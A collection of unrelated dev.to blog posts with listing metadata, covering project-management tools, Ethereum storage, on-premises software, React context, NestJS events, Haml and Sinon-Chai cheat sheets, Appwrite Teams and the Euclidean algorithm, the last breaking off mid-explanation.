- Capabilities that agile teams often look for — Sprints, burndown charts, boards, scrum boards, etc. — that allow both scrum and kanban implementation
- Developer-friendly due to deep integration with Git, markdown support, and `/` commands
- Git workflow automation along with Slack to perform status updates and receive instant notifications
- Brings in customer feedback from multiple sources like Canny, Intercom, etc., and helps prioritize it
- Great pricing plan!
[Have a look at all the functionalities that Zepel offers here](https://zepel.io/features/?ref=header/?utm_source=zepelblog&utm_medium=text&utm_campaign=jira-vs-github).
**Pricing:**
[Zepel’s pricing plan](https://zepel.io/pricing/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github) is simple. The free plan doesn’t charge a penny for the first 5 members forever. So, no matter how many members you add, the first 5 members will never be charged. The paid plans for each member starting from the 6th is at **$5/member/month** paid annually **$7/member** paid monthly.
**Best For:**
Development teams of any size that desire to build software products the agile way.
### 2. Wrike
Wrike is a popular Jira competitor that was also created for serving agile teams. Akin to Jira and GitHub, Wrike also lacks an intuitive user interface and has a very steep learning curve. But unlike the two apps, Wrike isn't a bug tracking software. It is a traditional project management tool like Zepel.

**Key Highlights:**
- Workspaces that are customizable
- Dynamic reports that are easy to share, insightful, and visual
- Boards, Gantt, and Calendar view to track progress and plan deadlines
- Workload and resource administration
- Shareable task lists and custom dashboards
[Check out all the functionalities Wrike offers](https://www.wrike.com/features/).
**Pricing:**
Wrike's free plan limits you to add up to 5 members only. The [paid plans](https://www.wrike.com/price/) start at **$9.80/member/month**.
**Best For:**
Agile product development and non-technical orgs that are small in size.
### 3. ClickUp
ClickUp is a well-known PM app that aims to be an all-in-one suite and has a wide target audience belonging to different sectors. Similar to Jira, ClickUp offers plenty of functionalities and integrations.

**Key Highlights:**
- Offers functionalities suitable for any company pertaining to any industry
- Supports a long list of views, namely, board, list, gantt, workload, box, table, calendar, activity, several reporting features, and mind maps.
- Easily customizable to serve your software development agency’s
- A massive number of third-party apps to integrate with
Good customer support
[Here’s everything that ClickUp offers](https://clickup.com/features).
**Pricing:**
ClickUp's [pricing plan](https://clickup.com/pricing) includes a free plan that allows you to add unlimited users but with functionality restrictions. The paid plan starts at **$5/user/month**.
**Best For:**
Small software companies and non-technical orgs of any size.
---
## 3 Reasons why Zepel fits the bill for your business
Let's take a look at not one but three reasons why Zepel is the PM app meant for your squad:
### 1. Collaborate with agile squads of any size to implement Scrum, Kanban or both
Zepel enables you to onboard and collaborate with product development squads of any size with ease. And it's powerful agile capabilities are every software squad's dream.
### 2. Ensure both your customers and your squad's happiness
Zepel’s Streams functionality helps bring in customer requests from various platforms and build customer-focussed features that are sure to satisfy your customers. Moreover, it gives your dev squad all the context they need and provides deep integrations with Git to do all the grunt work for them.
### 3. Right features, right pricing
Zepel offers just the right amount of features that your squad will need in order to build the best software products. Zepel's straightforward pricing plan is the icing on the cake. The free forever plan enables you to add up to 5 members for free, forever and without any functionality restrictions. So, even if your squad expands and you must add more members, you won’t be charged for the first 5. The paid plan starts at **$5/member**.
---
Impressed but want to see how Zepel fares in comparison with competitor agile project management tools? [Go ahead and check it out here](https://zepel.io/blog/agile-tools/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github).
You can also get a [no strings attached demo](https://zepel.io/request-demo/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github) to learn more about Zepel and see for yourself [why 4000+ development teams love Zepel](https://zepel.io/customer-reviews/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github). Or sign up and [take Zepel for a spin for free](https://zepel.io/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github). | ranjalir |
695,843 | Where and how application
data is stored in Ethereum?
| This article was published in 2017, updated in February 2021. Ethereum is used to build decentralize... | 12,677 | 2021-05-12T10:24:23 | https://laurentsenta.com/articles/storage-and-dapps-on-ethereum-blockchain/ | blockchain, database, decentralization, softwareengineering |
This article was [published in 2017](https://laurentsenta.com/articles/storage-and-dapps-on-ethereum-blockchain/), updated in February 2021.
Ethereum is used to build decentralized applications, a.k.a. DAPPs. These applications exist *through* small programs that live on the Blockchain, called *smart contracts*.
Before jumping into the platform and writing a smart contract, it’s really important to understand where your application data is stored. Code execution, servers and programming language are rarely critical to the design of an application. But data --its structure and its security-- will constrain our design the most.
Let's imagine we are porting apps to Ethereum:
- For a *Facebook-like*, where are the publications and comments data?
- For a *Dropbox-like*, where are my private files?
- For a *Slack-like* chat app, where do we store discussion channels? And what about private messages?
## The Account Machine
Let’s skip the explanation of blockchain for a minute (you can read my post on why Blockchain can be best understood as a [machine that generates Consensus here](https://laurentsenta.com/articles/the-point-of-the-blockchain/)). Let’s look at Ethereum from a higher level of abstraction -- the *software* that powers it, which is basically a big, slow, reliable computer.
Ethereum holds a set of accounts. Every account has an owner and a balance (a quantity of Ether).
If I prove my identity, I can transfer Ether from my account to another. The money will flow from one account to the other. It's an atomic operation called a “transaction”.
In other words, the *Ethereum Software* is a transaction processing system that works as follows:
1. The system is in a certain state, i.e. every account has a certain balance.
2. We carry out one or more transactions
3. We get a new state: an updated set of accounts and their balances.
It’s as simple as that!
With that out of the way, we can turn our attention to how to execute code and programs within a transaction. And that's where *Smart Contracts* come into play.
## Robot Accounts
Every account has an owner and a balance. But some of these accounts are special: they own themselves. At creation time, we give them a piece of code and memory. That's a *Smart Contract*.
A smart contract is really a smart bank account. The term "contract" is unclear—I prefer to think of them as Robot Accounts.
A smart contract is basically a robot that executes some code when it receives transactions. This transaction happens within the blockchain. It is public, replicated and validated by the network. That means a smart contract won't fail because of a power outage in a Datacenter.
A smart contract has a balance, some code, and some storage. This storage is [persistent][persistence], and that’s where we’ll find DAPP data.
## Storage of Robot Accounts
When a smart contract is created or when a transaction awakens it, the contract’s code can read and write to its storage space.
Here’s a breakdown of its Storage Specifications:
- It's a big dictionary (key-value store) that maps keys to values.
- Keys are strings of 32 bytes. We can have 2<sup>32 x 8 bits</sup> = 2<sup>256</sup> different keys. Same for values.
- It's like Redis, RocksDB or LevelDB storage.
- DAPP and Smart Contracts function in a similar way to a hard-drive storage in a regular program.
Here's an example of a Smart Contract structure. It uses the Solidity Programming Language:
```
'' Solidity Code (solidity.readthedocs.io)
struct Voter {
uint weight;
bool voted;
uint8 vote;
address delegate;
}
```
2<sup>256</sup> keys x 32 bytes (values) is around 10<sup>63</sup> PETABYTES. You would need several billions of times the age of the universe to go through this amount of data with an SSD.
Basically, we can safely assume that there’s no storage limit for a DAPP.
But there **is** a cost:
## DAPPs Fuel
For every transaction, we add some Ether, the fuel needed to power it. The emitter of the transaction pays this tax to motivate the miners to process the transaction. Miners ensure the network is reliable and we reward them with some Ether.
So we send transactions and some fuel to this big machine. When the transaction targets a Smart Contract, the Ethereum machine starts the Account’s Robot. Each action of this robot will burn some more gas.
The actions taken by this robot are translated into instructions in the *Ethereum Virtual Machine* (EVM). There are instructions to read in storage, instructions to write, and so on. Each of these transactions has a cost in fuel, and that cost will constrain how much storage we can use.
## Storage Cost
The cost of each instruction in a Smart Contract will limit the amount of storage it uses. In theory, Ethereum enables infinite storage space. But, in return, you have to provide gas for every read/write operation.
This cost changes all the time, depending on the network, the market and the way Ethereum specs develop. To get a general idea of the pricing, I simulated a few Smart Contracts:
I tried three operations:
1. Writing a `uint8` (one byte) in storage
2. Incrementing a `uint8` in the storage (read then write)
3. A simple voting function, which checks whether the emitter of the transaction has the right to vote and then updates the vote result. You can vote only once; the second attempt is short-circuited.
Code and tools are in the Appendix below. Here are the numbers:

(note from 2021: numbers here are outdated, but the currency is so volatile these days, use this as a rough order of magnitude).
Based on this table, this article would cost around 50 Euros to store with a Smart Contract, excluding pictures.
Posting a tweet costs a few euros, and ordering on Amazon a few cents.
Of course, these are estimations with different orders of magnitude. The exact cost will depend on the exact instructions you use, as well as on the network load, the current price of gas, etc. New algorithms might also bring down the price of Ethereum (Proof Of Stake).
## Finally, where should I store my data?
Well, maybe not on the Ethereum Blockchain. The data stored there, with Smart Contracts, is safe and easy to access. But the cost and the structure of the store is especially suited for metadata-related uses.
Taking the examples from the introduction: User Posts, Files and Message Boxes will probably be on another platform like IPFS. In the Ethereum Blockchain, we would store critical data, like encryption keys, roots to storage trees & authorizations.
Find all my previous articles on [laurentsenta.com](https://laurentsenta.com/articles/storage-and-dapps-on-ethereum-blockchain/)
## Appendix
Piece of code used for the table:
```
pragma solidity ^0.4.0;
contract Test {
mapping(uint =\> uint) tests;
function Test() {
}
function one_set() {
tests[0] = 0;
}
function two_increment() {
tests[0] = tests[0] + 1;
}
}
/// Give a single vote to proposal $(proposal).
function vote(uint8 proposal) {
Voter storage sender = voters[msg.sender];
if (sender.voted || proposal >= proposals.length) return;
sender.voted = true;
sender.vote = proposal;
proposals[proposal].voteCount += sender.weight;
}
}
```
Tools used to run the code and evaluate the costs:
Ethereum Gas Station to follow gas cost
Remix Solidity IDE to write and run Smart Contracts
- [Ethereum Gas Station](http://ethgasstation.info/) to follow gas cost
- [Remix Solidity IDE](https://remix.ethereum.org/) to write and run Smart Contracts
[persistence]: https://en.wikipedia.org/wiki/Persistence_(computer_science) | laurentsenta |
695,893 | On-premises software advantages | Despite all the trends about and putting your data online, many companies still prefer hosting everyt... | 0 | 2021-05-20T12:58:10 | https://apiumhub.com/tech-blog-barcelona/on-premises-software-advantages/ | devops | ---
title: On-premises software advantages
published: true
date: 2021-05-11 07:12:00 UTC
tags: DevOps
canonical_url: https://apiumhub.com/tech-blog-barcelona/on-premises-software-advantages/
---
Despite all the trends about and putting your data online, many companies still prefer hosting everything on internal servers. Although this means a significant investment in IT equipment, infrastructure, licenses, and support personnel, on-premises software advantages have some significant privileges over cloud-hosted software, which we will discuss later on in the article.
## What is on-premises software
With on-premises software, from implementation to running of the solution, everything is done internally; whereby maintenance, safety and updates also need to be taken care of in-house.
With on-premises software, the company remains responsible for maintaining the solution and related processes. The deployment is done in house using the company’s infrastructure.
On-premises software is installed and runs on computers on the premises of the person or organization using the software, rather than at a remote facility such as a server farm or cloud.
With this usage model, a customer often buys or rents server-based software as a licensee, which is installed on their own servers or rented servers.
It is more expensive than on-demand or cloud software because it requires in-house server hardware, capital investment in software licenses, in-house IT support staff and longer integration periods. However, on-premises software is considered more secure, as the entire instance of software remains on the organization’s premises.
Many companies opt for on-prem because it doesn’t require third-party access, gives owners physical control over the server hardware and software, and does not require them to pay month after month for access.
### On-premises software advantages
- On-premise applications are reliable, secure, and allow enterprises to maintain a level of control that the cloud often cannot.
- In an on-premises environment, enterprises retain all their data
- Companies that have extra sensitive information, such as government and banking industries must have a certain level of security and privacy that an on-premises environment provides.
- Access to data is always ensured – even without an internet connection.
- The licensed software can be integrated deeper into the customer’s infrastructure and interlinked with other programs.
- Annual maintenance costs and one-time license fees are lower compared to paying recurring expenses associated with cloud software.
- Multiple users can also access the system simultaneously without affecting the speed.
- Since you’ll handle all of the on-premises software yourself, you’ll likely be able to customize it much more than if you were subscribing to a cloud-based system.
- It’s typically easier to install extra data protection tools to data and programs based on an on-premises system rather than a cloud-based one.
- You decide on the configuration, the upgrades and system changes.
I hope you found this article with on-premises software advantages useful! And if you need any help with on-premises software solutions, [let us know](https://apiumhub.com/tech-hub-barcelona/)! We can help! Also, we have [B2B2C customer identity and access management solution](https://vyou-app.com/) that can be installed on-premises and that can help you speed up time to market and decrease costs. | apium_hub |
695,983 | The importance of Magneto and Salesforce Integration | The enterprise of online product selling is growing these days. Particularly, regarding the pandemic... | 0 | 2021-05-12T12:47:04 | https://dev.to/iamsiddhant21/the-importance-of-magneto-and-salesforce-integration-59b3 | php, programming | The enterprise of online product selling is growing these days. Particularly, regarding the pandemic time, whilst human beings had no preference but to the motel to eCommerce, structures to shop for critical products.
In this digital technology, there are so many effective structures to be had to create a similarly effective eCommerce website. Magento shop is considered one of them that enjoys an extraordinary deal of flexibleness and open-source functions to boost the income sample. However, [Magento Salesforce integration](https://www.orangemantra.com/services/salesforce-integration/) turns to magic for enterprises to higher understand clients, offer customized products, and offer a stronger level of customer service.
##what is Salesforce?
Salesforce is one of the main CRM (customer relationship management) platforms that offers an interactive view of consumer’s preferences and tendencies. It allows to prepare and quantify user’s information primarily based on personal info and buying patterns to apprehend the interest level.
With having Salesforce incorporated into your Magento keep, you will consolidate your advertising and marketing sports, automate e-mail methods, social media promotions, and strategize advertising activities.
Magento CRM integration calls for you to lease a Salesforce developer having years of knowledge in integrating technical components to automate behavior.
[Read more](https://www.orangemantra.com/blog/top-benefits-of-magento-salesforce-integration/) | iamsiddhant21 |
696,013 | Upcoming SaaS in robotic process automation in logistics | Robotics technology is progressing slowly but surely in careful and thoughtful stages. Robots are amo... | 0 | 2021-05-12T13:43:35 | https://dev.to/ardasgroup/upcoming-saas-in-robotic-process-automation-in-logistics-hjo | Robotics technology is progressing slowly but surely in careful and thoughtful stages. Robots are among us right now.
Personal robots are busy cleaning the inside of our homes and helping to maintain our gardens. Commercial robots are busy with the manufacturing side of the supply chain, mainly in the automotive industry. But where are all the robots in the logistics environment? Why are there so many advanced robots in warehouses that help tackle today's distribution challenges? Robotics technology is progressing slowly but surely in careful and thoughtful stages. Robots are among us right now.
This article on Logistics Trends explores these issues in detail. You will find that designing an advanced robot is costly and a major technological challenge. You will find that the distribution environment is complex and difficult to automate. But every day, there are breakthroughs in robotics that help us overcome these challenges.
continue reading https://ardas-it.com/upcoming-saas-in-robotic-process-automation-in-logistics | ardasgroup | |
696,246 | Journey to the real world by cloning DEV.to backend server(part 1) | In this long series we will explore amazing library and framework by implementing dev.to backend ser... | 12,683 | 2021-05-12T16:26:16 | https://dev.to/harshmangalam/journey-to-the-real-world-by-cloning-dev-to-backend-server-1icm | In this long series we will explore amazing library and framework by implementing dev.to backend server.
### Tools we will use
1. Nodejs
> Nodejs is a javascript runtime which allow javascript to run outside the browser. Nodejs was developed by Ryan Dahl which utilize google v8 javascript engine.
You can learn more about nodejs [here](https://nodejs.org/)
2. Graphql
> Graphql is a query language for API which provide full power to frontend developer to query data according to requirement without too much hassle.
Graphql is alternative to REST in REST we create a bunch of endpoints using different http verbs like GET , POST , PUT , DELETE etc.. but in graphql we have one and only one endpoint which will always make a POST request no matter what your intension about getting data or updating data.e
Graphql was developed and open source by facebook you can learn more about graphql [here](https://graphql.org/)
3. Apollo Server
> Apollo server is a graphql implementation for production use and can be used easily with any graphql client like relay , urql , apollo client etc..
You can explore much about apollo server [here](https://www.apollographql.com/docs/apollo-server/)
4. Express
> Express is a most popular , unopinionated nodejs based web framework. We will use express as middleware to handle file server. You can explore about express js [here](https://expressjs.com/).
5. Prisma 2
> Prisma is a Next-Gen javascript and typescript ORM . It generate types for your model and provide highlight during development to work faster.
You can explore prisma 2 [here](https://www.prisma.io/)
For the sake of simplicity we will use javascript to develop complete backend.
From next series we will install dependencies required to setup our project | harshmangalam | |
696,536 | The Crazy decoupler - NestJs Emitter | Those of us who have used NestJs are familiar of the architectural flow. We break code into modules.... | 0 | 2021-05-12T21:22:12 | https://dev.to/vjnvisakh/the-crazy-decoupler-nestjs-emitter-34hg | nestjs, events, emitter, listener | Those of us who have used NestJs are familiar of the architectural flow. We break code into modules. Modules have controller which are basically the public endpoints. And then there are services which can be injected on demand.
It gets messy when we have to communicate across modules. Sure if you are using micro-services it's a different game altogether, but there is something in NestJs which gives crazy level of decoupling. And those are called Event Emitters.
By using this guy, you can emit an event in a controller/service and listen for it in another controller/service WITHOUT importing them into each other. How cool is that. Wonder why we don't use it more often. Hmm!!! Need to read up on the cons of this stuff too I guess.
But till then, here is how simple it is.
**THE EMITTER**
```
@Get("emit")
async emit()
{
this.EventEmitter.emit
(
'hello',
"My name is Antony Gonzalves!"
);
}
```
**THE LISTENER**
```
@OnEvent('hello')
handleOrderCreatedEvent(message)
{
console.log("I am expecting some messages now!");
console.log(message);
}
```
Points to note -
1. The emitter and listener are two separate files - can be controllers or services - doesn't matter.
2. The emitter basically emits an event called "hello" with data "My name is Antony Gonzalves!".
3. The listener is waiting for an event "hello". As soon as it receives, it prints the message out.
Crazy simple.
Please comment on the cons of this approach if you guys know any.
Happy Programming !!! | vjnvisakh |
696,564 | The truth about Technical debt? | I am always posting provoking post on my Linkedin, and I have decided to replicate those... | 0 | 2021-05-12T23:39:49 | https://dev.to/apssouza22/have-you-ever-reflected-on-tech-debt-2o0n | linkedinposts, projectmanagement, techlead | ###### I am always posting provoking post on my Linkedin, and I have decided to replicate those here. [Let's socialize!](https://www.linkedin.com/in/alexsandro-souza-dev)
Technical debt is widely used and discussed within engineering teams. However, in people mind, it looks like it accumulates because of some nasty, dirty practices.
Technical debt piles up even when you work with the best intentions and follow the best practices.
Why?
Because Tech debt is not ONLY a result of prioritizing speedy delivery or poor development skills but a natural result of writing code about something we don't have a proper understanding of the complete solution
Knowing that, a natural response is to invest more in the design phase. However, in reality, you can not capture and learn everything before start implementing the solution. The future is uncertain and might bring radical changes.
A leaner cycle is the best option. Take a piece of the Design effort and move it forward in a refactoring phase that happens every time a few pieces have consolidated and are ready to be secured.
In this scenario, we accept debt creation, trusting our ability to repay it in the short term.
Like financial debt, tech debt can harm or help your organization. To use it wisely, engineers and team leaders must monitor how much technical debt they acquire and learn to manage it well.
### Free Advanced Java Course
I am the author of the [Advanced Java for adults course](https://www.udemy.com/course/advanced-java-for-adults/?referralCode=8014CCF0A5A931ADED5F). This course contains advanced and not conventional lessons. In this course, you will learn to think differently from those who have a limited view of software development. I will provoke you to reflect on decisions that you take in your day to day job, which might not be the best ones. This course is for middle to senior developers and we will not teach Java language features but how to lead complex Java projects.
This course's lectures are based on a Trading system, an opensource project hosted on my [Github](https://github.com/apssouza22/trading-system). | apssouza22 |
696,940 | How To Use Context Hooks In React | The React has released the Context API as if we need to pass data to multiple nested components. But... | 0 | 2021-05-13T08:58:32 | https://dev.to/sivavadlamuri/how-to-use-context-hooks-in-react-bgf | react, reactnative, javascript, redux | The React has released the Context API as if we need to pass data to multiple nested components. But the Context API was a bit bulky and difficult to use in class components. With the release of React hooks, the React team decided to release use context hook which is more simplified and easy to use.
What Is The Context API?
As we already know React uses State to store the data and props to pass the data between the components. This is well and good for the local state and if you want to pass the data between Parent to Child. This normal state and props will be difficult when you start to have a global state or props that need to be passed to deeply nested components.
when you pass down props through a bunch of different components so they can get to one single component far down the hierarchy actual problem starts.
This is where context API comes into the picture, With this context API you can specify certain data that will be available to all components, So there is no need to pass this data through each component to nested component. It is a semi-global state that is available anywhere inside the context.
Here there will be three things to remember
i) createContext() which is used to create the context
ii) Provider which provides the data
iii) Consumer which consumes the data which is given by the Provider
Example :
const ThemeContext = React.createContext()
function App() {
const [theme, setTheme] = useState('dark')
return (
<ThemeContext.Provider value={{ theme, setTheme }}>
<ChildComponent />
</ThemeContext.Provider>
)
}
function ChildComponent() {
return <GrandChildComponent />
}
class GrandChildComponent {
render() {
return (
<ThemeContext.Consumer>
{({ theme, setTheme }) => {
return (
<>
<div>The theme is {theme}</div>
<button onClick={() => setTheme('light')}>
Change To Light Theme
</button>
</>
)
}}
</ThemeContext.Consumer>
)
}
}
In the above code example, we are creating a new context using React.createContext. The React.createContext gives us a variable that has two things.
The first part is a provider which provides data to all components nested inside of it. In our case the data is a single object with the theme and setTheme properties.
The second thing is the consumer. This is what you must wrap your code in to access the value of the context. This component expects a function as the child of it and that function gives you the value of the context as the only argument for the function. Then in that function you can just return the JSX that component utilizes the context.
The Above Code is a little bit difficult because it is hard to work with the context
Luckily, with the function components, we can avoid all that mess code by using the useContext hook.
In order to use context data in a functional component you no need to wrap up the data in JSX in consumer. Instead, all you need to do is pass your context to the useContext hook and it will do all the magic for you
function GrandChildComponent() {
const { theme, setTheme } = useContext(ThemeContext)
return (
<>
<div>The theme is {theme}</div>
<button onClick={() => setTheme('light')}>
Change To Light Theme
</button>
</>
)
}
}
Conclusion
In the end the useContext hook is very simple to use. All it does is provide a nice interface for consuming context data, but that interface is so much better than the original context consumer interface. Next time if you are working with context in your application make sure to give useContext a try.
If you want to learn React Js we strongly recommend AchieversIT

| sivavadlamuri |
696,963 | Haml Cheat Sheet | Ruby -# This is a comment -# Anything starting with a hyphen signals to Haml that Ruby... | 0 | 2021-05-13T09:22:39 | https://dev.to/hoanganhlam/haml-cheat-sheet-54gn | haml, cheatsheet |
### Ruby
```haml
-# This is a comment
-# Anything starting with a hyphen signals to Haml that Ruby is coming
- @arr = [1, 2, 3]
- @str = "test"
-# Equal signals output
= render partial: "shared/header"
= yield
= link_to page_url
```
### Inline Attributes
Either hash syntax works
```haml
%meta{ name: "viewport", content: "width=device-width, initial-scale=1.0" }
%input{ :type => "text", :required => true }
```
### Classes and ID's
```haml
%p.class-example
.no-tag-defaults-to-div
%div#butItCanBeIncluded
```
### Tags
```haml
%html
%head
%title
%body
%h1 Hello World
%br/
```
### Doctype
```haml
!!! 5
```
### Reference
* [Haml Cheat Sheet](https://cheatsheetmaker.com/haml) - [Cheat Sheet Maker](https://cheatsheetmaker.com) | hoanganhlam |
697,130 | Sinon-Chai Cheat Sheet | Should spy.should.have.been.called spy.should.have.been.calledOnce spy.shou... | 0 | 2021-05-13T11:21:56 | https://dev.to/hoanganhlam/sinon-chai-cheat-sheet-55fe | sinonchai, cheatsheet |
### Should
```
spy.should.have.been.called
spy.should.have.been.calledOnce
spy.should.have.been.calledTwice
spy.should.have.been.calledThrice
spy1.should.have.been.calledBefore(spy2)
spy1.should.have.been.calledAfter(spy2)
spy.should.have.been.calledWithNew
spy.should.always.have.been.calledWithNew
spy.should.have.been.calledOn(context)
spy.should.always.have.been.calledOn(context)
spy.should.have.been.calledWith(...args)
spy.should.always.have.been.calledWith(...args)
spy.should.always.have.been.calledWithExactly(...args)
spy.should.always.have.been.calledWithExactly(...args)
spy.should.have.been.calledWithMatch(...args)
spy.should.always.have.been.calledWithMatch(...args)
spy.should.have.returned(returnVal)
spy.should.have.always.returned(returnVal)
spy.should.have.thrown(errorObjOrErrorTypeStringOrNothing)
spy.should.have.always.thrown(errorObjOrErrorTypeStringOrNothing)
```
### Assert
```
expect(spy).called
expect(spy).calledOnce
expect(spy).calledTwice
expect(spy).calledThrice
expect(spy).calledBefore
expect(spy).calledAfter
expect(spy).calledWithNew
expect(spy).alwaysCalledWithNew
expect(spy).calledOn
expect(spy).alwaysCalledOn
expect(spy).calledWith
expect(spy).alwaysCalledWith
expect(spy).calledWithExactly
expect(spy).alwaysCalledWithExactly
expect(spy).calledWithMatch
expect(spy).alwaysCalledWithMatch
expect(spy).returned
expect(spy).alwaysReturned
expect(spy).threw
expect(spy).alwaysThrew
```
### Initialization
```js
var sinon = require('cs/sinon');
require('cs/chai').use(require('cs/sinon-chai'));
```
### Reference
* [Sinon-Chai Cheat Sheet](https://cheatsheetmaker.com/sinon-chai) - [Cheat Sheet Maker](https://cheatsheetmaker.com) | hoanganhlam |
697,188 | #30DaysOfAppwrite : Appwrite Teams | Intro #30DaysOfAppwrite is a month-long event focused on giving developers a walkthrough... | 0 | 2021-05-13T13:09:02 | https://dev.to/appwrite/30daysofappwrite-appwrite-teams-2fjd | javascript, webdev, flutter, 30daysofappwrite | ## Intro
[#30DaysOfAppwrite](http://30days.appwrite.io/) is a month-long event focused on giving developers a walkthrough of all of Appwrite's features, starting from the basics to more advanced features like Cloud Functions! Alongside we will also be building a fully-featured Medium clone to demonstrate how these concepts can be applied when building a real-world app. We also have some exciting prizes for developers who follow along with us!
## Teams API
Welcome to Day 13 👋. Today we'll go through the Teams API and understand how it allows us to manage permissions for groups of users easily. The main purpose of Teams API is to create groups of users and grant bulk permissions in an easy way. These permissions can then be used to control access to Appwrite's resources like documents and files in storage.
Let's say you have a text file that you would like to share with a group of friends. In that case, you can create a team and give different roles to the team members. (view, edit, comment, owner etc.)
Team permissions in Appwrite use one the following syntaxes
* **team:[TEAM_ID]**
This permission grants access to any member of the specific team. To gain access to this permission, the user must be the team creator (owner), or receive and accept an invitation to join this team.
* **member:[MEMBER_ID]**
This permissions grants access to a specific member of a team. This permission will only be valid as long as the user is still an active member of the specific team. To view a user's member ID, fetch the team members list using the [Get Team Memberships](https://appwrite.io/docs/client/teams?sdk=web#teamsGetMemberships) endpoint.
* **team:[TEAM_ID]/[ROLE]**
This permission grants access to any member who possesses a specific role in a team. To gain access to this permission, the user must be a member of the specific team and have the given role assigned to them. Team roles can be assigned when inviting a user to become a team member. `ROLE` can be any string. However, the `owner` role is created automatically when a new team is created from a Client SDK.
Let's take a few examples to make this clear:
| Permission | Description |
| ---- | ---- |
| team:abcd | access to all members of team abcd |
| team:abc | Access to all members of team abc |
| member:abc | Access to a user with membershipId abc |
| team:abcd/owner | Access to members of team abcd who have the role `owner`. By default, only the creator of the team has this role. |
| team:abcd/viewer | Access to members of team abcd who have the role `viewer`. |
The Teams API is accessible from both the Client and Server SDKs. We will cover how to create these teams and assign roles using both the Client and Server SDKs 😊.
## Gotchas
There are notable differences between when you create a team from a client-side SDK and when you create a team using a server-side SDK.
When a user creates a team using a Client SDK, they become the team owner and are automatically assigned the **`team:[TEAM_ID]/owner`** role.
When you create a team using a Server SDK using an API key, there is no logical owner since API keys run in [admin mode](https://appwrite.io/docs/admin). In this case, the Server SDK should also create the first member of the team and explicitly assign the owner permissions. We will cover these with an example.
## Client SDK
This is where you can find the docs for the [Client Teams API](https://appwrite.io/docs/client/teams). Creating a team is really simple - all you need to do is think of a "Really Cool Name".
```js
let promise = sdk.teams.create('unique()', 'Really Cool Name');
promise.then(function (response) {
console.log(response); // Success
}, function (error) {
console.log(error); // Failure
});
```
Notice the first parameter we passed in, which is the string `'unique()'`, which tells Appwrite to generate a random team ID for the new team. Appwrite supports custom IDs, so you can pass in your own custom IDs using this parameter, too.
This will create a team with the current user as the `owner`. You can verify this by heading to your **Appwrite Console** > **Users** > **Teams** > **Really Cool Name**

To add new members to this team, you can make use of the [`createMembership()`](https://appwrite.io/docs/client/teams#teamsCreateMembership) function. Only `owners` of a team can add new members to the team. An email with a link to join the team will be sent to the new member's email address. If the member doesn't exist in the project, it will be created automatically.
> Before this, ensure that you have SMTP setup on your Appwrite Server. We covered this in our previous tutorial on Day 11.
Let's say you would like to invite a new member ( `email@example.com` ) to your team and grant them two new roles in the team, namely: `viewer` and `editor`. You can do this using the following snippet. Use the 'URL' parameter to redirect the user from the invitation email back to your app. When the user is redirected, use the [Update Team Membership Status](https://appwrite.io/docs/client/teams?sdk=web#teamsUpdateMembershipStatus) endpoint to allow the user to accept the invitation to the team.
```js
let promise = sdk.teams.createMembership('[TEAM_ID]', 'email@example.com', '', ['viewer', 'editor'], 'https://example.com/acceptTeamInvite');
promise.then(function (response) {
console.log(response); // Success
}, function (error) {
console.log(error); // Failure
});
```
When the user clicks on the team invitation email from their inbox, they will be redirected to `https://example.com/acceptTeamInvite?teamId=xxx&inviteId=yyy&userId=zzz&secret=xyz`. The four parameters can then be extracted from the query string, and the `updateMembershipStatus()` method can be called to confirm membership to the team.
```js
let promise = sdk.teams.updateMembershipStatus('[TEAM_ID]', '[INVITE_ID]', '[USER_ID]', '[SECRET]');
promise.then(function (response) {
console.log(response); // Success
}, function (error) {
console.log(error); // Failure
});
```
We will use this in practice in tomorrow's tutorial where we add support to invite users to a team in our blog app!
## Server SDK
The server version of the function looks really similar to the client version, but the key difference here is the usage of an API key with a `teams.read` and `teams.write` scopes. This function creates a team, but unlike the Client SDK, this team has no members yet.
```js
const sdk = require('node-appwrite');
// Init SDK
let client = new sdk.Client();
let teams = new sdk.Teams(client);
client
.setEndpoint('https://<HOSTNAME_OR_IP>/v1') // Your API Endpoint
.setProject('<Your Project ID>') // Your project ID
.setKey('<Your API Key>') // Your secret API key
;
let promise = teams.create('unique()', 'Really Cool Team');
promise.then(function (response) {
console.log(response);
}, function (error) {
console.log(error);
});
```
We need to explicitly add members to this team using the Server version of [`createMembership()`](https://appwrite.io/docs/server/teams?sdk=nodejs#teamsCreateMembership). The parameters here are exactly the same as the Client version.
```js
let promise = teams.createMembership('[TEAM_ID]', 'email@example.com', '', ['owner'], 'https://example.com/acceptTeamInvite');
promise.then(function (response) {
console.log(response);
}, function (error) {
console.log(error);
});
```
When a new member is added to the team from the server, email verification is not required, and hence no email will be sent in this case.
That's a wrap! You now know how to add new members to your team, both from the client and the server. In the next article, we will add this functionality to our demo app!
## Credits
We hope you liked this write-up. You can follow [#30DaysOfAppwrite](https://twitter.com/search?q=%2330daysofappwrite) on Social Media to keep up with all of our posts. The complete event timeline can be found [here](http://30days.appwrite.io)
* [Discord Server](https://appwrite.io/discord)
* [Appwrite Homepage](https://appwrite.io/)
* [Appwrite's Github](https://github.com/appwrite)
Feel free to reach out to us on Discord if you would like to learn more about Appwrite, Aliens or Unicorns 🦄. Stay tuned for tomorrow's article! Until then 👋
| christyjacob4 |
697,397 | Euclidean Algorithm meaning & python snippet | This algorithm helps us get the greatest common divisor(gcd) of 2 integers. In other words, the resul... | 0 | 2021-05-13T16:24:41 | https://dev.to/coucoseth/euclidean-algorithm-meaning-python-snippet-4la5 | machinelearning, python, algorithms | This algorithm helps us get the greatest common divisor(gcd) of 2 integers. In other words, the result of our computation is the highest possible number `(lets say 1)` that we can divide by two given numbers `(4 and 5)` which will give a remainder `(or you could say left over after a division)` of zero for both given numbers. Lets break this down a little bit :
our two numbers earlier were `4` and `5`, but these could be any random numbers which follow two rules :
1st >> one number must be larger than the other.
2nd >> both must not be even numbers.
The euclidian algorithm formula is `q = a * b + r` where the letters are placeholders for numbers forexample
```
5 = 4 * 1 + 1 or
11 = 2 * 5 + 1
```
Lets get our hands a little dirty and see how we arrived to the answers of 5 and 11 above:
`now is the time to open your editor and create a python file so we can write some simple code. my file is called index.py`
When calculating we always have our 2 numbers, remember earlier we chose `(4 and 5)`. These numbers replace `q` and `a` whereby `q` takes the bigger number `(5)` and `a` the smaller `(4)` so `5 = 4 * b + r` therefore in `index.py`
```
# formula is q = a * b + r
q = 5
a = 4
```
